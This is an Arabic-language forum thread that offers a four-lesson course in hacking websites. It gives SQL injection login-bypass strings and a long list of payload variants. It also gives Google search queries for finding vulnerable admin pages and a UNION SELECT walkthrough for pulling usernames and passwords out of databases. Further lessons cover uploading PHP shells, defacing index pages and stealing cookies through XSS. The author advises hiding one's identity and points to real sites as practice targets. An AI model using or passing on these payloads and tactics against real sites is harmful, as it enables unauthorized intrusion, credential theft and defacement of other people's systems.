كسر احتكار أختراق المواقع تعلم الاختراق بكل سهوله للراغبين بتعلم هكر المواقع

بسم الله الرحمن الرحيم
راح ابدي وياكم دروس حتى تتعلمون الهكر مال المواقع من البداية الى نقطه تكومون تفتهمون اشلون تخترقون المواقع و تسيطرون عليها و انتوا اتكملون وراها بس راح اساعدكم مساعده حلوه ان شاء الله


الدرس الاول :
اهم شي لازم تعرفه هو بعض النقاط الاساسية على اختراق المواقع حتى اتصير عندك فكرة عليها :
1- مو كل المواقع تخترق , اكو مواقع تطمغ عليها طمغه مكتوب عليها غير قابله للاختراق unhackable
2- مو كل عمليات الاختراق للمواقع مثمرة يعني اكو مواقع صحيح تخترقها بس توصل لنقطه متكدر اسوي شي بيها لنفرض مجرد دخلت الى لوحة التحكم و ملكيت بيها شي يساعدك على اختراق الموقع اذن عمليه اختراق فاشلة اوكي
3- اختراق الموقع عن طريق عدة ثغرات معدودات , لا يغرك سماع اشخاص يتحدثون عن اختراقهم لمواقع بطرق غريبة من اكتشافهم , ما اتصور اكو هيجي شي بس يجوز عن طريق خدعه همه قاموا بيها بعدين اعلمك اياها
4- لا تعلن عن اسمك ديربالك لأن هايه الشغلات وراها طلايب , اختار اسم مستعار nickname
5- ما بيها شي اذا تستخدم برنامج يساعدك على الاختراق عادي كلش كلش يعني ما ينزل من سمعتك بين الهكرية بس يجوز يطلعلك واحد من الاخوة الهكرجية و يكعد يستفزك انت لا تهتم
6- دائما من تخترق موقع حاول تكدر ترجع تخترق الموقع من جده و جديد في حالة كشفك صاحب الموقع بس عادي اذا ما كدرت ترجع للموقع القديم دور على مواقع غيرها
7- خلي ابالك انو المواقع اهوايه يعني لا تجلب بموقع او موقعين و لا تنقهر لمن يروح منك موقع
8- مرات راح اتصادف اكو مواقع لمن تخترقها عن طريق الشيل راح تكدر تسيطر على كل المواقع الي على السيرفير بهيجي حالة لازم يكون هدفك هو مقدرتك على الرجوع للشيل يعني يبقى السيرفير جوه ايدك
9- تدمير السيرفير شي شخصي بس هايه الشغلات لازم اتفكر بيها لمن تحترف مو هسه
10- أهم شي بأختراق المواقع هو الذكاء و أستعمال مهارات العقل بأختراق المواقع بس لا تنسى انو مو كل المواقع قابله للأختراق


انتهى الدرس الأول بفضل الله انتظروا الدرس الثاني




الدرس الثاني من سلسلة تعلم الأختراق


بهذا الدرس راح اشرح شنو لازم الواحد يعرفه حول الphp و الhtml حتى يكوم يفتهم اشلون المواقع دا تشتغل


لغة الhtml لغة صناعة صفحات و ليس برمجة , المبرمج يستخدمها من خلال برنامج microsoft frontpage و هايه اللغة جدا مهمة من ناحية ادخال المعلومات و الانتقال الى صفحات اخرى محموله ببيانات مدخله او بدونها مثلا صفحة التسجيل في منتدى او موقع , صفحة دخول مدير الموقع.


لغة الphp لغة برمجة صفحات انترنيت و هايه اللغة كلش مهمة و حلوة و لكن يحتاجلها معرفه اشلون الوحد يكدر يتعلمها , من خلال النقاط التالية :
1- لازم اول شي الواحد عنده برنامج server appachi هذا شنو ؟ هذا برنامج يتنصب على الوندوز و يصير الوندوز كأنه موقع على الانترنيت بيه مزايه الموقع و قاعدة البيانات بس شنو كل سيرفير و اصداره انصح بأستخدام appachi 2.8.5 هذا بالنسبه اليه يمشي غرض الواحد الي يريد يتعلم هكر .


2- الشخص لمن يشتري فد شي لنفرض كمبيوتر مو مهم يعرف اشلون ديشتغل المذربورد او أجزاء الكمبيوتر لأن هذا فد شي صعب بس سبحان الله للعقل البشري الي صنعه فلذلك مو مهم الواحد يتعلم كلشي عن لغة الphp حتى يكدر يهكر لا بس تبقى يم الشخص اذا يحب يكون مبرمج و بنفس الوقت هكر بس الشخص بمرور الوقت راح يتعلم البرمجه و يفتهم حذافيرها المهم , المطلوب فهمه من اللغة هو
*السيجن او الكوكيز
*كيفية الارتباط بقاعدة البيانات و جلب المعلومات و ادخالها و التعديل عليها
*كيفية التعامل مع الفورم يعني صفحة الادخال


هسة راح اشرح شغله شغله اوكي
السيجن او الكوكيز حتى تفهمون بسرعه معناها هي فد اداة اكتشوفها وية لغة الphp تساعد على توفير صلاحيات و خصائص ما كانت موجودة قبل باللغة اشلون يعني ؟ هايه الاداة مستخدمه بصفحات مدير الموقع و غيرها بالصفحات الي تتطلب اسم مستخدم و كلمة سر, صفحة التحكم بالموقع يحطون بيها كود السيجن و الكوكيز راح يشوف شنو اكو بالكوكيز فرضا لكه كلمة (لا) يهيجي حالة رح يعتبر انو عملية الدخول فاشله بس لمن الواحد يدخل معلومات صحيحة بصفحة الدخول لصفحة التحكم راح تتغير الكلمة الى كلمة (نعم)و راح تنقري الكلمة من خلال كود موجود بصفحة لوحة التحكم بالموقع و يعتبر العملية صحيحة و يدخل الى لوحة التحكم اوكي , مو اله يكون بالكوكيز اكو كلمة (لا) او (نعم) اي كلمة او حرف او رمز بس المهم اكو كود بنفس الصفحة راح يچيك الكلمة الموجود بالكوكيز وية كلمة موجودة بالكود.


ما يميز لغة الphp هو قدرتها على الارتباط بقاعدة بيانات و قراءتها و مسح و تعديل البيانات فيها و لكن اكو مشكلة ظهرت و هي تعتبر الثغرة بالكود و الي يسمح للهكر بأختراق الموقع و هذا مثال عنها:
الكود الخاص بربط قاعدة البيانات يسموه الاستعلام او query و يكون بالشكل التالي
query=select from admin where usernme='$user' and password='$pass'

هسة شرح الكود و اشلون الواحد يستغله لأختراق الموقع قبل كلشي القاعدة مال البيانات يكون بيها جداول و حقول و بنص الحقول اكو بيانات المهم هسة اسم الجدول هو admin و أسم الحقول username و password و المتغيرين $user و $pass يحملون القيم المدلخه من قبل المستخدم في صفحة الدخول الخطأ الواحد الي يكدر يسوي بهذا الكود هو اي شي نكتبه بصفحة الدخول راح ينزل بنص الاستعلام اوكي يعني لنفرض احنه كتبنه كلمة myname راح يصير الكود بالشكل التالي
query=select from admin where usernme='myname' and password='$pass'

اذا نكدر نكتب كود يهمل التأكد من كلمة السر اشلون عن طريق الرمز -- او /* و هايه الرموز تجعل كلشي وراها مهمل يعني تعتبره كلام خارج عن التنفيذ فراح يكون ادخالنه لأسم المستخدم هو a' or 1=1 --
زين هسة اتكولون ليش كتبنه 1=1 بالحقيقة اول شي لمن شرحتلكم عن الكوكيز الفكرة نفسها امطبقيها اهنانه بس الون عن طريق التأكد من وجود متغير يحمل قيمة معينه , لمن الواحد يدخل بمعلومات صحيحة راح يسجل بالكود الرقم واحد عن طريق الدالة mysql fetch arrary يعني هايه الدالة لمن تستلم تسجيل دخول صحيح تسجل الرقم واحد و الكود الثاني يتأكد من المتغير و القيمه الي يحملها و يچيكها ويه قيمه موجوده بالكود و اذا غلط يعتبر عملية التسجيل خطأ فلذلك احنه نكدر اذا نعرف أسم المستخدم ان نكتب كود الاستغلال بالطريقة التالية بأعتبار أسم المستخدم هو admin ,admin'-- بهيجي حالة راح يچيك أسم المستخدم وية أسم المستخدم الموجودة بقاعدة البيانات و يعتبرها صحيحة و يهمل كلمة السر لوجود الرمز -- و راح يكون الكود بالشكل التالي بعد الاستغلال الاول
query=select from admin where usernme='a' or 1=1 -- and password='$pass'

و يكون الكود بعد التنفيذ بالشكل التالي:
query=select from admin where usernme='a' or 1=1

و اذا ادخلنا اسم المستخدم راح يكون الكود بالشكل التالي:
query=select from admin where usernme='admin'-- and password='$pass'

و يكون الكود بعد التنفيذ بالشكل التالي:
query=select from admin where usernme='admin'


هذا بالنسبة لثغرة sql injection او bypassing logins



الفورم هو صفحة ادخال البيانات و اكو طريقتين مستخدمه و هي POST و GET الفرق بيناتها الاوله POST لمن تنقل المعلومات ما تظهر بشريط المتصفح بس الثانيه GET تظهر المعلومات المدخلة مع المتغير الي يحملها و هايه راح نستخدمها بثغرة ال mysql injection
لنفرض فورم نقل بنظام الPOST
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


فورم نقل بنظام ال GET
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

هذا الفرق الي بيناتهم


هذا اهم شي لازم الشخص يعرفه لأختراق المواقع


انتهى الدرس الثاني بعون الله تعالى انتظروا الدرس الثالث



الدرس الثالث


شرح اختراق لوحات التحكم بثغرة الsql injection او bypassing login
شرح اكتشاف ثغرة ال mysql injection و طريقة استغلاله


أختراق لوحة التحكم شرحته قبل بس هسة راح انطي الزبده مالته لمن الواحد يشوف صفحة دخول مدير الموقع يكتب الهكر بخانة اسم المستخدم و كلمة السر الكود التالي
a' or 1=1 --

او يكتب الكود التالي
' or '1' = '1


ويدوس على دخول و يتوكل على الله بس لو تشتغل لو ما تشتغل
او اكو حالات نكتب الكود بخانه و نترك الخانه الثانية فارغه , او نكتب بخانه الكود و بالخانه الثانية نكتب اي شي ما عدا الرمز ' او احد الرموز الخاصة بالphp -- , /*
ملاحظة : اكو كودات اهوايه خاصه بثغرة الsql injection و للامانة منقولة
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
و اكو طريقة الواحد يدور بيها على مواقع مصابه يدخل على جوجل و يكتب احد كلمات البحث التالية
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
راح تطلعله مواقع يدور موقع موقع و يكتب كود الاستغلال بخانتي اليوزر نيم و الباسورد

حتى الواحد يكتشف ثغرة ال myql injection لازم يكون نظام نقل المعلومات هو GET و راح انحط باللنك الركز التالي ' يعني يصير بالشكل التالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

اذا طلعلنه خطأ يكول
MySQL Syntax Error By '5'' In news.php on line 15.
error that says us to check the correct MySQL version or MySQL Fetch error


أو خطأ ثاني معناها الموقع مصاب و يجوز ما تشتغل الثغرة بس مجرد وجود خطأ هايه الواحد يعرفها بس لازم اشوية الواحد يتعلم عن الphp


هسة يجي دور معرفة عدد الحقول المصابة بالصفحة هايه الحقول راح تظهر على شكل ارقام و بعدين راح نستغلها بكتابة أسم الحقول الموجودة بقاعدة بيانات الموقع

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

هذا الكود الي كتبناه وره اللنك راح يچيك كم حقل اكو مصاب بالصفحة و لازم احنه بنقى انغير بالرقم 1 الى اي رقم بس بالتسلسل الى ان نوصل الى اختفاء الخطأ بس مرات نحتاج انحط الرمز ' كدام الرقم 5 ليكون بالشكل التالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

و مرات نحتاج انحط الرمز - ورة الرقم 5 ليكون الكود بالشكل التالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

و بعدين لنفرض اكو 3 حقول مصابة راح يكون كود الاستغلال بالشكل التالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

و لنفرض انو اسم الحقول و اسم الجدول في قاعدة البيانات هي user و pass و admin
فراح يكون كود الاستغلال بالشكل التالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

و راح انشوف اسم المستخدم و كلمة السر بالصفحة بمكان الرقم 1 و 2 و بس يبقى الرقم 3


بس تبقى طريقة جلب اسماء الجداول و الحقول تاخذ وقت فأكو برنامج اسمه sql helper 2.7
موجود بالمنتدى بقسم اختراق المواقع و موجود وياها الشرح الواحد يكدر يستخدمه


انتهى الدرس الثالث بعون الله انتظروا الدرس الرابع


بسم الله الرحمن الرحيم


الطرق الاحترافية لأختراق المواقع


راح اشرح اشلون الواحد يخترق الموقع بصورة الأحتراف لنفرض الهكر دخل على لوحة تحكم الموقع و لكه بالاختيارات اختيار رفع ملف فراح يجرب رفع كود مكتوب بلغة الphp مصاب بثغرة الinclusion او أي ثغرة اخرى يحب يجربها الهكر بس اقوى ثغرة هي ثغرة الinclusion و هي ثغرة تضمين ملفات بعيده يعني الواحد يكدر يفتح شيل او اي ملف و كأنه مرفوع على الموقع او يرفع s-h-e-l-l مباشرة و الs-h-e-l-l عبارة عن كود مكتوب بلغة ال php يسيطير على الموقع بصورة كاملة او متوسطه او ضعيفه حسب اعدادات السيرفير و الموقع و الهكر بس المهم منه محاولة رفع ثغرة او شيل و اذا انرفعت على الموقع يفتح الثغرة و يستغلها او يفتح الشيل و يسيطر على الموقع بس مثل ما كلت قبل , كل موقع و اعداداته لأن اكو مواقع الواحد يكدر يغير الصفحة الرئيسية مثل ما انشوف الهكرچية "تم اختراق موقع الفلاني" نفتح الموقع و انشوف صفحة اختراق هذا يتم عن طريق رفع شيل و تغيير الindex او الصفحة الرئيسية و العملية كلش سهلة بس ينرادلها تجربة , كل ما يحتاجلها هو بعد الاختراق و رفع الشيل و الدخول على الindex و اختيار امر التعديل و من ثم صنع صفحة بالfrontpage و نسخ الكود الخاص بها و نقله بدل كود الindex و من ثم حفظه كل ذلك يستغرق ثواني.



و اكو ثغرات غير ثغرة الsql injection و الmysql injection مثلا ثغرة الXSS و ثغرة الCSI
(ثغرة الCSI من اكتشافي تلكوها بنفس المنتدى) بس ثغرة الXSS مال تچنيص لأن هايه الثغرة تسحب الكوكيز مال صاحب الموقع بس لازم الواحد يدز لنك لصاحب الموقع و يكعد ينتظر صاحب الموقع يدوس على اللنك و لازم يكون صاحب الموقع فاتح الحساب الي يريد الهكر يبوگه المهم شغله طويله. و ثغرة الCSI
هايه من اكتشافي بس شنو ما الها اي علاقه بأختراق الموقع بس للتحايل على الموقع .


انتهى الدرس الرابع بعون الله تعالى و ان شاء الله اتكونون استفاديتوا و اي سؤال او استفسار اني حاضر
و راح احط مجموعه من المواقع الي تكدرون تخترقوها حتى تتعلمون


مواقع ذات ثغرة لوحة التحكم يعني اتحطون بخانتي اليوزر نيم و الباسورد الكود ' or '1' = '1
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


و اكو موقع لكيته مصاب بثغرة ال mysql injection و راح احط تسلسل عملية اختراقه
اول شي انحط الرمز ' راح يطلعلنا خطأ بقاعدة البيانات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

اذا نستنتج اكو ثغرة بالموقع نجرب نكتب الامر order by
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

راح يطلعلنا خطأ , راح انزيد الرقم واحد يصير 9 راح يطلعلناه خطأ يكول
Unknown column '9' in 'order clause'
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

اذا نستنتج ان عدد الحقول المصابه هي 8 نكتب كود الاستغلال union select و دوسوا انتر راح اتشوفون ارقام ال3 و 5 بنص الموقع اذا نستنتج انو هايه الحقول هي المصابة فراح نستغلها
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

زين الجدول و الحقول مال اليوزرنيم و الباسورد طلعناها من برنامج الsql helper 2.7
ملاحظة ترة البرنامج sql helper يقوم بأكتشاف الجداول و الحقول كلها و حتى يقره البيانات بس اني دا اعلمكم اشلون الواحد يطلع البيانات من الموقع رأسا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] 8+from+users--

راح اتشوفون اسم المستخدم و كلمة السر بنص الموقع و اكو طريقة تطلع كل البيانات الموجودة بالحقول المطلوبة و ذلك بأستخدام الامر group_concat قبل الحقول و الها اهمية بأن تعرض المعلومات بحق واحد
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] serPassword),4,5,6,7,8+from+users--

الرمز 0x3a يعني الاشارة , بس هايه الاشارة بلغة الHEX
مرات اكو مواقع يجوز توصل عدد الحقول الى 40 او 50 او 60 او اكثر ومرات بس حقل واحد


و مرات تطلعلكم كلمة السر فد كود طويل هذا يكون مشفر بنظام تشفير اسمه md5 و اكو مواقع و برامج تكسر تشفيره بس هذا النظام مال التشفير كلش قوي [b]

شو رايك فيني مو خطيره خخخخخخ

قريبا راح اهكر موقع المنتدى خخخخ



نورتي موضوعي
يالدلوعه

موضوع رائع
تسلم ايدك بسمه